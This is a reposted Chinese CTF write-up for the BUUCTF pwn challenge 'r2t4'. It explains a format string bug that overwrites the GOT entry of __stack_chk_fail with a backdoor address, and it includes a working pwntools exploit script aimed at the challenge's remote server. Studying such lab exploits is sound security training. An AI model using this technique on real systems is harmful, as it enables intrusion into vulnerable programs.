其他分享
首页 > 其他分享> > [BUUCTF-pwn]——[BJDCTF 2nd]r2t4

[BUUCTF-pwn]——[BJDCTF 2nd]r2t4

作者:互联网

[BUUCTF-pwn]——[BJDCTF 2nd]r2t4

checksec一下,看一下。
在这里插入图片描述
IDA中,发现了后面函数和格式化字符串漏洞。
在这里插入图片描述
在这里插入图片描述
找到后门函数的地址, 并且算格式化字符串的偏移
在这里插入图片描述
在这里插入图片描述

思路

开启了canary保护,我们想要执行我们想要执行的代码, 可以通过触发canary保护, 进而触发__stack_chk_fail函数,执行。我们将got表地址改为我们想要执行的地址就可以了。
fmtstr_payload是pwntools继承的一个模板,可以用来直接修改地址

exploit

from pwn import *
context(arch='amd64',os='linux',word_size='64')
backdoor = 0x0000000000400626
p = remote("node3.buuoj.cn",25583)
elf = ELF('./r2t4')
__stack_chk_fail = elf.got['__stack_chk_fail']

payload = fmtstr_payload(6, {__stack_chk_fail:backdoor}).ljust(0x38, 'a')
p.sendline(payload)
p.interactive()

标签:__,stack,chk,2nd,r2t4,pwn,fail,payload
来源: https://blog.csdn.net/Y_peak/article/details/113934330